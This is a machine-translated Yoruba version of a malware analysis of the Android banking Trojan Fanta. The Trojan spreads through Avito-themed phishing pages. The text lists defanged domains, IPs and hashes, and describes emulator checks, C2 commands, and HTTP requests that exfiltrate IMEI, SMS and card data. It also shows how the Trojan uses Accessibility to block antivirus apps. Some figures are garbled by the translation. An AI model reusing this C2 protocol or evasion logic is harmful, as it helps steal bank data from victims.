Ni ọjọ kan o fẹ ta ohunkan lori Avito ati, ti o ti firanṣẹ alaye alaye ti ọja rẹ (fun apẹẹrẹ, module Ramu), iwọ yoo gba ifiranṣẹ yii:
Ni kete ti o ṣii ọna asopọ naa, iwọ yoo rii oju-iwe ti o dabi ẹnipe aibikita ti n sọ ọ leti, olutaja ti o ni idunnu ati aṣeyọri, pe rira kan ti ṣe:
Ni kete ti o tẹ bọtini “Tẹsiwaju”, faili apk kan pẹlu aami kan ati orukọ ti o ni igbẹkẹle yoo ṣe igbasilẹ si ẹrọ Android rẹ. O fi ohun elo kan sori ẹrọ ti o beere fun awọn ẹtọ AccessibilityService, lẹhinna awọn ferese meji kan han ti o si parẹ ni kiakia ati... Iyẹn ni.
O lọ lati ṣayẹwo iwọntunwọnsi rẹ, ṣugbọn fun idi kan ohun elo ile-ifowopamọ rẹ tun beere fun awọn alaye kaadi rẹ lẹẹkansi. Lẹhin titẹ data naa, nkan ti o buruju ṣẹlẹ: fun idi kan ti ko ṣe akiyesi rẹ, owo bẹrẹ lati farasin lati akọọlẹ rẹ. O n gbiyanju lati yanju iṣoro naa, ṣugbọn foonu rẹ kọju: o tẹ awọn bọtini “Pada” ati “Ile”, ko pa a ati pe ko gba ọ laaye lati mu awọn igbese aabo ṣiṣẹ. Bi abajade, o fi silẹ laisi owo, awọn ọja rẹ ko ti ra, o daamu ati iyalẹnu: kini o ṣẹlẹ?
Idahun si jẹ rọrun: o ti di olufaragba Android Trojan Fanta, ọmọ ẹgbẹ ti idile Flexnet. Bawo ni eyi ṣe ṣẹlẹ? Jẹ ki a ṣe alaye ni bayi.
Awọn onkọwe: Andrey Polovinkin, alamọja kekere ni itupalẹ malware, Ivan Pisarev, ojogbon ni malware onínọmbà.
Diẹ ninu awọn iṣiro
Idile Flexnet ti Android Trojans di mimọ ni akọkọ ni ọdun 2015. Lori akoko iṣẹtọ pipẹ ti iṣẹtọ, ẹbi naa gbooro si ọpọlọpọ awọn ipin: Fanta, Limebot, Lipton, ati bẹbẹ lọ. Tirojanu naa, ati awọn amayederun ti o ni nkan ṣe pẹlu rẹ, ko duro jẹ: awọn ero pinpin imunadoko tuntun ti wa ni idagbasoke - ninu ọran wa, awọn oju-iwe aṣiri didara ga ti o ni ero si olutaja olumulo kan pato, ati awọn olupilẹṣẹ Tirojanu tẹle awọn aṣa asiko ni kikọ ọlọjẹ - n ṣafikun iṣẹ ṣiṣe tuntun ti o jẹ ki o ṣee ṣe lati ji owo daradara siwaju sii lati awọn ẹrọ ti o ni ikolu ati awọn ọna aabo fori.
Ipolowo ti a ṣalaye ninu nkan yii jẹ ifọkansi si awọn olumulo lati Russia; nọmba kekere ti awọn ẹrọ ti o ni akoran ni a gbasilẹ ni Ukraine, ati paapaa diẹ ni Kasakisitani ati Belarus.
Paapaa botilẹjẹpe Flexnet ti wa ni gbagede Android Trojan fun ọdun mẹrin bayi ati pe ọpọlọpọ awọn oniwadi ti ṣe iwadi ni kikun, o tun wa ni apẹrẹ to dara. Bibẹrẹ lati Oṣu Kini ọdun 4, iye ibajẹ ti o pọju jẹ diẹ sii ju 2019 million rubles - ati pe eyi jẹ fun awọn ipolongo ni Russia nikan. Ni ọdun 35, ọpọlọpọ awọn ẹya ti Tirojanu Android yii ni a ta lori awọn apejọ ipamo, nibiti koodu orisun ti Tirojanu pẹlu apejuwe alaye le tun rii. Eyi tumọ si pe awọn iṣiro ti ibajẹ ni agbaye paapaa jẹ iwunilori diẹ sii. Kii ṣe afihan buburu fun iru arugbo bẹẹ, ṣe kii ṣe bẹẹ?
Lati tita si ẹtan
Gẹgẹbi a ti le rii lati sikirinifoto ti a gbekalẹ tẹlẹ ti oju-iwe ararẹ fun iṣẹ Intanẹẹti fun ipolowo ipolowo Avito, o ti pese sile fun olufaragba kan pato. Nkqwe, awọn olukolu lo ọkan ninu awọn parsers Avito, eyi ti o yọ nọmba foonu ati orukọ ti eniti o ta ọja naa jade, bakannaa apejuwe ọja naa. Lẹhin faagun oju-iwe naa ati murasilẹ faili apk, olufaragba naa ni SMS kan pẹlu orukọ rẹ ati ọna asopọ si oju-iwe ararẹ kan ti o ni apejuwe ọja rẹ ati iye ti o gba lati “tita” ọja naa. Nipa tite bọtini naa, olumulo gba faili apk irira kan - Fanta.
Iwadii ti agbegbe shcet491[.] ru fihan pe o ti fi ranṣẹ si awọn olupin DNS ti Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Faili agbegbe agbegbe ni awọn titẹ sii ti n tọka si awọn adirẹsi IP 31.220.23[.]236, 31.220.23[.]243, ati 31.220.23[.]235. Sibẹsibẹ, igbasilẹ awọn orisun akọkọ ti agbegbe naa (Igbasilẹ) tọka si olupin kan pẹlu adiresi IP 178.132.1[.]240.
Adirẹsi IP 178.132.1[.]240 wa ni Fiorino ati pe o jẹ ti olutọju WorldStream. Awọn adirẹsi IP 31.220.23[.]235, 31.220.23[.]236 ati 31.220.23[.]243 wa ni UK ati pe o jẹ ti olupin alejo gbigba pinpin HOSTINGER. Ti a lo bi olugbasilẹ openprov-ru. Awọn ibugbe wọnyi tun pinnu si adiresi IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.] ru
- sdelka221[.] ru
- sdelka211[.] ru
- vyplata437[.] ru
- viplata291[.] ru
- perevod273[.] ru
- perevod901[.] ru
O yẹ ki o ṣe akiyesi pe awọn ọna asopọ ni ọna kika atẹle wa lati gbogbo awọn ibugbe:
http://(www.){0,1}<%domain%>/[0-9]{7}
Awoṣe yii tun pẹlu ọna asopọ kan lati ifiranṣẹ SMS kan. Da lori data itan, a rii pe agbegbe kan ni ibamu si awọn ọna asopọ pupọ ni apẹrẹ ti a ṣalaye loke, eyiti o tọka pe agbegbe kan ni a lo lati pin kaakiri Tirojanu si ọpọlọpọ awọn olufaragba.
Jẹ ki a fo siwaju diẹ diẹ: Tirojanu ti a ṣe igbasilẹ nipasẹ ọna asopọ kan lati SMS nlo adirẹsi naa gẹgẹbi olupin iṣakoso onuseseddohap[.] club. A forukọsilẹ agbegbe yii ni ọdun 2019-03-12, ati bẹrẹ lati 2019-04-29, awọn ohun elo apk ṣe ajọṣepọ pẹlu agbegbe yii. Da lori data ti o gba lati VirusTotal, apapọ awọn ohun elo 109 ṣe ajọṣepọ pẹlu olupin yii. Agbegbe funrararẹ pinnu si adiresi IP naa 217.23.14[.]27, be ni Netherlands ati ohun ini nipasẹ awọn hoster WorldStream. Ti a lo bi olugbasilẹ magbowo. Awọn ibugbe tun yanju si adiresi IP yii bad-racoon[.] club (bẹrẹ lati 2018-09-25) ati buburu-racoon[.] gbe (bẹrẹ lati 2018-10-25). Pẹlu ašẹ bad-racoon[.] club diẹ sii ju awọn faili apk 80 ti o ni ajọṣepọ pẹlu buburu-racoon[.] gbe - diẹ sii ju 100 lọ.
Ni gbogbogbo, ikọlu naa tẹsiwaju bi atẹle:
Kini o wa labẹ ideri Fanta?
Bii ọpọlọpọ awọn Trojans Android miiran, Fanta ni agbara lati ka ati fifiranṣẹ awọn ifiranṣẹ SMS, ṣiṣe awọn ibeere USSD, ati ṣafihan awọn window tirẹ lori oke awọn ohun elo (pẹlu awọn ile-ifowopamọ). Sibẹsibẹ, ohun ija ti iṣẹ ṣiṣe ti idile yii ti de: Fanta bẹrẹ lati lo Iṣẹ Wiwọle fun awọn idi oriṣiriṣi: kika awọn akoonu ti awọn iwifunni lati awọn ohun elo miiran, idilọwọ wiwa ati didaduro ipaniyan Tirojanu kan lori ẹrọ ti o ni arun, ati bẹbẹ lọ. Fanta ṣiṣẹ lori gbogbo awọn ẹya ti Android ko kere ju 4.4. Ninu nkan yii a yoo ṣe akiyesi diẹ si apẹẹrẹ Fanta atẹle:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Lẹsẹkẹsẹ lẹhin ifilọlẹ
Lẹsẹkẹsẹ lẹhin ifilọlẹ, Tirojanu tọju aami rẹ. Ohun elo naa le ṣiṣẹ nikan ti orukọ ẹrọ ti o ni arun ko ba si ninu atokọ naa:
- Android_x86
- VirtualBox
- Nexus 5X(ori akọmalu)
- Nesusi 5(fele)
Ayẹwo yii ni a ṣe ni iṣẹ akọkọ ti Tirojanu - Iṣẹ akọkọ. Nigbati o ba ṣe ifilọlẹ fun igba akọkọ, awọn aye atunto ohun elo jẹ ipilẹṣẹ si awọn iye aiyipada (ọna kika fun titoju data iṣeto ati itumọ wọn yoo jiroro nigbamii), ati pe ẹrọ tuntun ti o ni akoran ti forukọsilẹ lori olupin iṣakoso. Ibere HTTP POST kan pẹlu iru ifiranṣẹ yoo firanṣẹ si olupin naa forukọsilẹ_bot ati alaye nipa ẹrọ ti o ni ikolu (Ẹya Android, IMEI, nọmba foonu, orukọ oniṣẹ ati koodu orilẹ-ede ninu eyiti oniṣẹ ti forukọsilẹ). Adirẹsi naa n ṣiṣẹ bi olupin iṣakoso hXXp://onuseseddohap[.]club/controller.php. Ni idahun, olupin naa fi ifiranṣẹ ranṣẹ ti o ni awọn aaye naa bot_id, bot_pwd, server - ohun elo naa ṣafipamọ awọn iye wọnyi bi awọn aye ti olupin CnC. Paramita server iyan ti aaye naa ko ba gba: Fanta nlo adirẹsi iforukọsilẹ - hXXp://onuseseddohap[.]club/controller.php. Iṣẹ ti yiyipada adirẹsi CnC le ṣee lo lati yanju awọn iṣoro meji: lati pin kaakiri fifuye ni deede laarin awọn olupin pupọ (ti o ba wa nọmba nla ti awọn ẹrọ ti o ni arun, fifuye lori olupin wẹẹbu ti ko dara julọ le jẹ giga), ati tun lati lo. olupin yiyan ni iṣẹlẹ ikuna ti ọkan ninu awọn olupin CnC.
Ti aṣiṣe kan ba waye lakoko fifiranṣẹ ibeere naa, Tirojanu yoo tun ilana iforukọsilẹ lẹhin iṣẹju-aaya 20.
Ni kete ti ẹrọ naa ba ti forukọsilẹ ni aṣeyọri, Fanta yoo ṣafihan ifiranṣẹ atẹle si olumulo naa:
Akọsilẹ pataki: iṣẹ ti a pe Aabo eto - orukọ iṣẹ Tirojanu, ati lẹhin titẹ bọtini naa ОК Ferese kan yoo ṣii pẹlu awọn eto Wiwọle ti ẹrọ ti o ni ikolu, nibiti olumulo gbọdọ fun awọn ẹtọ Wiwọle fun iṣẹ irira:
Ni kete ti olumulo ba tan Iṣẹ WiwọleFanta ni iraye si awọn akoonu ti awọn window ohun elo ati awọn iṣe ti a ṣe ninu wọn:
Lẹsẹkẹsẹ lẹhin gbigba awọn ẹtọ Wiwọle, Tirojanu beere awọn ẹtọ alabojuto ati awọn ẹtọ lati ka awọn iwifunni:
Lilo Iṣẹ Wiwọle, ohun elo naa ṣe afarawe awọn bọtini bọtini, nitorinaa fifun ararẹ gbogbo awọn ẹtọ to wulo.
Fanta ṣẹda awọn apẹẹrẹ data lọpọlọpọ (eyiti yoo ṣe apejuwe nigbamii) pataki lati tọju data iṣeto ni, ati alaye ti a gba ninu ilana nipa ẹrọ ti o ni akoran. Lati firanṣẹ alaye ti a gba, Tirojanu ṣẹda iṣẹ-ṣiṣe ti o tun ṣe lati ṣe igbasilẹ awọn aaye lati ibi ipamọ data ati gba aṣẹ lati ọdọ olupin iṣakoso. Aarin fun iraye si CnC ti ṣeto da lori ẹya Android: ninu ọran ti 5.1, aarin yoo jẹ iṣẹju-aaya 10, bibẹẹkọ 60 awọn aaya.
Lati gba aṣẹ naa, Fanta ṣe ibeere kan Gba Iṣẹ-ṣiṣe si olupin isakoso. Ni idahun, CnC le fi ọkan ninu awọn aṣẹ wọnyi ranṣẹ:
| Egbe | Apejuwe |
|---|---|
| 0 | Fi ifiranṣẹ SMS ranṣẹ |
| 1 | Ṣe ipe foonu kan tabi pipaṣẹ USSD |
| 2 | Ṣe imudojuiwọn paramita kan aarin |
| 3 | Ṣe imudojuiwọn paramita kan ikolu |
| 6 | Ṣe imudojuiwọn paramita kan sms Manager |
| 9 | Bẹrẹ gbigba awọn ifiranṣẹ SMS |
| 11 | Tun foonu rẹ to awọn eto ile-iṣẹ |
| 12 | Mu ṣiṣẹ/Pa gedu ti ṣiṣẹda apoti ajọṣọ |
Fanta tun gba awọn ifitonileti lati awọn ohun elo ile-ifowopamọ 70, awọn eto isanwo iyara ati e-Woleti ati fi wọn pamọ sinu aaye data kan.
Titoju iṣeto ni sile
Lati tọju awọn aye atunto, Fanta nlo ọna boṣewa fun pẹpẹ Android - Preferences- awọn faili. Awọn eto yoo wa ni ipamọ si faili ti a npè ni eto. Apejuwe ti awọn paramita ti o fipamọ wa ninu tabili ni isalẹ.
| Имя | Iwọn aiyipada | Awọn iye to ṣeeṣe | Apejuwe |
|---|---|---|---|
| id | 0 | odidi | Bot ID |
| server | hXXp://onuseseddohap[.]club/ | URL | Dari adirẹsi olupin |
| pwd | - | okun | Ọrọigbaniwọle olupin |
| aarin | 20 | odidi | Aarin akoko. Tọkasi bi o ṣe gun awọn iṣẹ ṣiṣe atẹle wọnyi yẹ ki o da duro:
|
| ikolu | gbogbo | gbogbo/telNumber | Ti aaye ba dọgba si okun gbogbo tabi telNọmba, lẹhinna ifiranṣẹ SMS ti o gba yoo jẹ idilọwọ nipasẹ ohun elo ati kii ṣe han si olumulo |
| sms Manager | 0 | 0/1 | Mu ṣiṣẹ / mu ohun elo ṣiṣẹ bi olugba SMS aiyipada |
| readDialogue | èké | Otitọ/eke | Mu ṣiṣẹ/Pa iwọle iṣẹlẹ ṣiṣẹ Iṣẹlẹ Wiwọle |
Fanta tun lo faili naa sms Manager:
| Имя | Iwọn aiyipada | Awọn iye to ṣeeṣe | Apejuwe |
|---|---|---|---|
| pckg | - | okun | Orukọ oluṣakoso ifiranṣẹ SMS ti a lo |
Ibaraenisepo pẹlu infomesonu
Lakoko iṣẹ rẹ, Tirojanu nlo awọn apoti isura data meji. Database ti a npè ni a ti a lo lati fipamọ orisirisi alaye ti a gba lati inu foonu naa. Awọn keji database ti wa ni oniwa fanta.db ati pe a lo lati fipamọ awọn eto ti o ni iduro fun ṣiṣẹda awọn ferese aṣiri ti a ṣe apẹrẹ lati gba alaye nipa awọn kaadi banki.
Tirojanu nlo aaye data а lati fipamọ alaye ti o gba ati wọle awọn iṣe rẹ. Data ti wa ni ipamọ ninu tabili kan awọn àkọọlẹ. Lati ṣẹda tabili kan, lo ibeere SQL atẹle yii:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Ipamọ data ni alaye wọnyi:
1. Wọle si ibẹrẹ ti ẹrọ ti o ni arun pẹlu ifiranṣẹ kan Foonu naa wa ni titan!
2. Awọn iwifunni lati awọn ohun elo. Ifiranṣẹ naa jẹ ipilẹṣẹ ni ibamu si awoṣe atẹle:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Awọn data kaadi banki lati awọn fọọmu aṣiri ti a ṣẹda nipasẹ Tirojanu. Paramita VIEW_NAME le jẹ ọkan ninu awọn wọnyi:
- AliExpress
- Avito
- Google Play
- Oriṣiriṣi
Ifiranṣẹ naa ti wọle ni ọna kika:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Awọn ifiranṣẹ SMS ti nwọle/ti njade ni ọna kika:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Alaye nipa package ti o ṣẹda apoti ibaraẹnisọrọ ni ọna kika:
(<%Package name%>)<%Package information%>
tabili apẹẹrẹ awọn àkọọlẹ:
Ọkan ninu awọn iṣẹ ti Fanta ni gbigba ti awọn alaye nipa awọn kaadi banki. Gbigba data waye nipasẹ ẹda ti awọn ferese aṣiri nigbati ṣiṣi awọn ohun elo ile-ifowopamọ. Tirojanu naa ṣẹda ferese ararẹ ni ẹẹkan. Alaye ti window ti han si olumulo ti wa ni ipamọ ninu tabili kan eto ninu ibi ipamọ data fanta.db. Lati ṣẹda aaye data kan, lo ibeere SQL atẹle yii:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Gbogbo tabili awọn aaye eto nipa aiyipada initialized to 1 (ṣẹda a ararẹ window). Lẹhin ti olumulo ti tẹ data wọn sii, iye yoo ṣeto si 0. Apeere ti awọn aaye tabili eto:
- le_wole - aaye naa jẹ iduro fun iṣafihan fọọmu nigba ṣiṣi ohun elo ile-ifowopamọ kan
- first_bank - ko lo
- le_avito - aaye naa jẹ iduro fun iṣafihan fọọmu nigba ṣiṣi ohun elo Avito
- le_ali - aaye naa jẹ iduro fun iṣafihan fọọmu nigba ṣiṣi ohun elo Aliexpress
- le_miran - aaye naa jẹ iduro fun iṣafihan fọọmu nigba ṣiṣi eyikeyi ohun elo lati atokọ naa: Yula, Pandao, Drom Auto, apamọwọ. Eni ati ajeseku awọn kaadi, Aviasales, fowo si, Trivago
- le_kaadi - aaye naa jẹ iduro fun iṣafihan fọọmu nigba ṣiṣi Google Play
Ibaraenisepo pẹlu olupin isakoso
Ibaraẹnisọrọ nẹtiwọki pẹlu olupin iṣakoso waye nipasẹ ilana HTTP. Lati ṣiṣẹ pẹlu nẹtiwọki, Fanta nlo ile-ikawe Retrofit olokiki. Awọn ibeere ni a fi ranṣẹ si: hXXp://onuseseddohap[.]club/controller.php. Adirẹsi olupin le yipada nigbati o forukọsilẹ lori olupin naa. Awọn kuki le jẹ firanṣẹ ni esi lati ọdọ olupin naa. Fanta ṣe awọn ibeere wọnyi si olupin naa:
- Iforukọsilẹ ti bot lori olupin iṣakoso waye ni ẹẹkan, ni ifilọlẹ akọkọ. Awọn data atẹle nipa ẹrọ ti o ni akoran ni a fi ranṣẹ si olupin naa:
· kukisi - awọn kuki ti o gba lati ọdọ olupin (iye aiyipada jẹ okun ti o ṣofo)
· mode - okun ibakan forukọsilẹ_bot
· ìpele - odidi ibakan 2
· version_sdk - ti ṣẹda ni ibamu si awoṣe atẹle: /(Avit)
· IMEI - IMEI ti awọn arun ẹrọ
· orilẹ-ede - koodu ti orilẹ-ede ninu eyiti oniṣẹ ti forukọsilẹ, ni ọna kika ISO
· nọmba - nomba fonu
· onišẹ - orukọ oniṣẹApeere ti ibeere ti a fi ranṣẹ si olupin naa:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Ni idahun si ibeere naa, olupin gbọdọ da ohun JSON kan pada ti o ni awọn aye atẹle wọnyi:
· bot_id - ID ẹrọ ti o ni arun. Ti bot_id ba dọgba si 0, Fanta yoo tun ṣe ibeere naa.
bot_pwd - ọrọigbaniwọle fun olupin.
olupin - Iṣakoso adirẹsi olupin. Iyan paramita. Ti a ko ba pato paramita, adirẹsi ti o fipamọ sinu ohun elo yoo ṣee lo.Apẹẹrẹ JSON ohun:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Beere lati gba aṣẹ lati ọdọ olupin naa. Awọn data atẹle ni a fi ranṣẹ si olupin naa:
· kukisi - cookies gba lati olupin
· idu - id ẹrọ ti o ni akoran ti o gba nigba fifiranṣẹ ibeere naa forukọsilẹ_bot
· pwd - ọrọ igbaniwọle fun olupin naa
· divice_admin - aaye naa pinnu boya awọn ẹtọ alakoso ti gba. Ti o ba ti gba awọn ẹtọ alakoso, aaye naa jẹ dogba si 1, bibẹkọ 0
· Ayewo - Wiwọle Service ipo isẹ. Ti iṣẹ naa ba bẹrẹ, iye jẹ 1, bibẹkọ 0
· SMS Manager - fihan boya Tirojanu ti ṣiṣẹ bi ohun elo aiyipada fun gbigba SMS
· iboju - ṣafihan kini ipo iboju wa ninu. Awọn iye yoo wa ni ṣeto 1, ti iboju ba wa ni titan, bibẹẹkọ 0;Apeere ti ibeere ti a fi ranṣẹ si olupin naa:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Da lori aṣẹ naa, olupin le da ohun JSON pada pẹlu awọn aye oriṣiriṣi:
· Egbe Fi ifiranṣẹ SMS ranṣẹ: Awọn paramita ni nọmba foonu, ọrọ ti ifiranṣẹ SMS ati ID ti ifiranṣẹ ti n firanṣẹ. A lo idamo nigba fifiranṣẹ ifiranṣẹ si olupin pẹlu iru setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Egbe Ṣe ipe foonu kan tabi pipaṣẹ USSD: Nọmba foonu tabi aṣẹ wa ninu ara idahun.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Egbe Yi paramita aarin.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Egbe Yi paramita kikọlu pada.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Egbe Yi aaye SmsManager pada.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Egbe Gba awọn ifiranṣẹ SMS lati ẹrọ ti o ni akoran.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Egbe Tun foonu rẹ to awọn eto ile-iṣẹ:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Egbe Yi ReadDialog paramita.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Fifiranṣẹ ifiranṣẹ pẹlu iru setSmsStatus. Ibeere yii ni a ṣe lẹhin pipaṣẹ naa Fi ifiranṣẹ SMS ranṣẹ. Ibeere naa dabi eyi:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Ikojọpọ awọn akoonu data. Ọna kan ti wa ni gbigbe fun ibeere. Awọn data atẹle ti wa ni fifiranṣẹ si olupin naa:
· kukisi - cookies gba lati olupin
· mode - okun ibakan ṣetoSaveInboxSms
· idu - id ẹrọ ti o ni akoran ti o gba nigba fifiranṣẹ ibeere naa forukọsilẹ_bot
· ọrọ - ọrọ ninu igbasilẹ data lọwọlọwọ (aaye d lati tabili awọn àkọọlẹ ninu ibi ipamọ data а)
· nọmba - orukọ igbasilẹ data lọwọlọwọ (aaye p lati tabili awọn àkọọlẹ ninu ibi ipamọ data а)
· sms_mode - iye odidi (aaye m lati tabili awọn àkọọlẹ ninu ibi ipamọ data а)Ibeere naa dabi eyi:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Ti o ba firanṣẹ ni aṣeyọri si olupin naa, ila naa yoo paarẹ lati tabili. Apeere ti ohun JSON ti olupin pada:
{ "response":[], "status":"ok" }
Ibaṣepọ pẹlu Iṣẹ Wiwọle
Iṣẹ Wiwọle ti ṣe imuse lati jẹ ki awọn ẹrọ Android rọrun lati lo fun awọn eniyan ti o ni alaabo. Ni ọpọlọpọ igba, ibaraenisepo ti ara ni a nilo lati ṣe ajọṣepọ pẹlu ohun elo kan. Iṣẹ Wiwọle gba ọ laaye lati ṣe wọn ni eto. Fanta nlo iṣẹ naa lati ṣẹda awọn ferese iro ni awọn ohun elo ile-ifowopamọ ati ṣe idiwọ awọn olumulo lati ṣiṣi awọn eto eto ati diẹ ninu awọn ohun elo.
Lilo iṣẹ ṣiṣe ti Iṣẹ Wiwọle, Tirojanu n ṣe abojuto awọn ayipada si awọn eroja loju iboju ti ẹrọ ti o ni arun. Gẹgẹbi a ti ṣalaye tẹlẹ, awọn eto Fanta ni paramita kan ti o ni iduro fun awọn iṣẹ ṣiṣe wọle pẹlu awọn apoti ajọṣọ - readDialogue. Ti a ba ṣeto paramita yii, alaye nipa orukọ ati apejuwe ti package ti o fa iṣẹlẹ naa yoo ṣafikun si ibi ipamọ data. Tirojanu n ṣe awọn iṣe wọnyi nigbati awọn iṣẹlẹ ba nfa:
- Ṣe afarawe titẹ ẹhin ati awọn bọtini ile ni awọn iṣẹlẹ wọnyi:
· ti olumulo ba fẹ tun ẹrọ rẹ bẹrẹ
· ti olumulo ba fẹ paarẹ ohun elo “Avito” tabi yi awọn ẹtọ iwọle pada
· ti o ba jẹ mẹnuba ohun elo “Avito” lori oju-iwe naa
· nigba ṣiṣi ohun elo Idaabobo Play Google
· nigba ṣiṣi awọn oju-iwe pẹlu awọn eto Iṣẹ Wiwọle
· nigbati apoti ajọṣọ System Aabo han
· nigba ṣiṣi oju-iwe naa pẹlu awọn eto “Fa lori ohun elo miiran”.
· nigbati o ba ṣii oju-iwe “Awọn ohun elo”, “Imularada ati tunto”, “Atunto data”, “Awọn eto atunto”, “Panel Olùgbéejáde”, “Special. awọn anfani", "Awọn anfani pataki", "Awọn ẹtọ pataki"
· ti iṣẹlẹ naa ba jẹ ipilẹṣẹ nipasẹ awọn ohun elo kan.Akojọ ti awọn ohun elo
- Android
- Titunto Lite
- Mimọ Titunto
- Mọ Titunto fun x86 Sipiyu
- Iṣakoso Gbigbanilaaye Ohun elo Meizu
- MIUI Aabo
- Titunto si mimọ - Antivirus & Kaṣe ati Isenkanjade idoti
- Awọn iṣakoso obi ati GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Aabo wẹẹbu Beta
- Isenkanjade ọlọjẹ, Antivirus, Isenkanjade (Aabo Max)
- Mobile AntiVirus Aabo PRO
- Antivirus Avast & aabo ọfẹ 2019
- Mobile Aabo MegaFon
- AVG Idaabobo fun Xperia
- Mobile Aabo
- Malwarebytes antivirus & aabo
- Antivirus fun Android 2019
- Titunto si Aabo - Antivirus, VPN, AppLock, Booster
- AVG antivirus fun Huawei tabulẹti System Manager
- Samsung Wiwọle
- Samsung Smart Manager
- Titunto si Aabo
- Iyara Booster
- Dokita
- Aabo Aabo Dr.Web
- Dr.Web Mobile Iṣakoso ile-iṣẹ
- Dr.Web Aabo Aye Aye
- Dr.Web Mobile Iṣakoso ile-iṣẹ
- Antivirus & Aabo alagbeka
- Aabo Intanẹẹti Kaspersky: Antivirus ati Idaabobo
- Igbesi aye batiri Kaspersky: Ipamọ & Igbega
- Aabo Ipari Kaspersky - aabo ati iṣakoso
- AVG Antivirus ọfẹ 2019 - Idaabobo fun Android
- Android Antivirus
- Norton Mobile Aabo ati Antivirus
- Antivirus, ogiriina, VPN, aabo alagbeka
- Aabo Alagbeka: antivirus, VPN, aabo ole
- Antivirus fun Android
- Ti o ba beere fun igbanilaaye nigbati o ba nfi ifiranṣẹ SMS ranṣẹ si nọmba kukuru, Fanta ṣe apẹrẹ tite lori apoti Ranti yiyan ati bọtini firanṣẹ.
- Nigbati o ba gbiyanju lati mu awọn ẹtọ alakoso kuro ni Tirojanu, o tii iboju foonu naa.
- Idilọwọ fifi awọn alakoso titun kun.
- Ti ohun elo antivirus dr.ayelujara ri irokeke, Fanta fara wé titẹ bọtini foju.
- Tirojanu ṣe simulates titẹ ẹhin ati bọtini ile ti iṣẹlẹ naa ba jẹ ipilẹṣẹ nipasẹ ohun elo naa Samsung Device Itọju.
- Fanta ṣẹda awọn ferese ararẹ pẹlu awọn fọọmu fun titẹ alaye nipa awọn kaadi banki ti ohun elo kan lati inu atokọ kan ti o pẹlu bii 30 oriṣiriṣi awọn iṣẹ Intanẹẹti ti ṣe ifilọlẹ. Lara wọn: AliExpress, Fowo si, Avito, Google Play Market Component, Pandao, Drom Auto, bbl
Fọọmu ararẹ
Fanta ṣe itupalẹ iru awọn ohun elo ti nṣiṣẹ lori ẹrọ ti o ni akoran. Ti o ba ṣii ohun elo ti iwulo, Tirojanu n ṣafihan window aṣiwadi kan lori gbogbo awọn miiran, eyiti o jẹ fọọmu fun titẹ alaye kaadi banki sii. Olumulo gbọdọ tẹ data wọnyi sii:
- Nomba kaadi
- Ọjọ ipari kaadi
- CVV
- Orukọ onimu kaadi (kii ṣe fun gbogbo awọn banki)
Ti o da lori ohun elo nṣiṣẹ, oriṣiriṣi awọn ferese aṣiri yoo han. Ni isalẹ wa ni apẹẹrẹ diẹ ninu wọn:
AliExpress:
Avito:
Fun awọn ohun elo miiran, fun apẹẹrẹ. Google Play Market, Aviasales, Pandao, Fowo si, Trivago:
Bawo ni o ṣe jẹ gaan
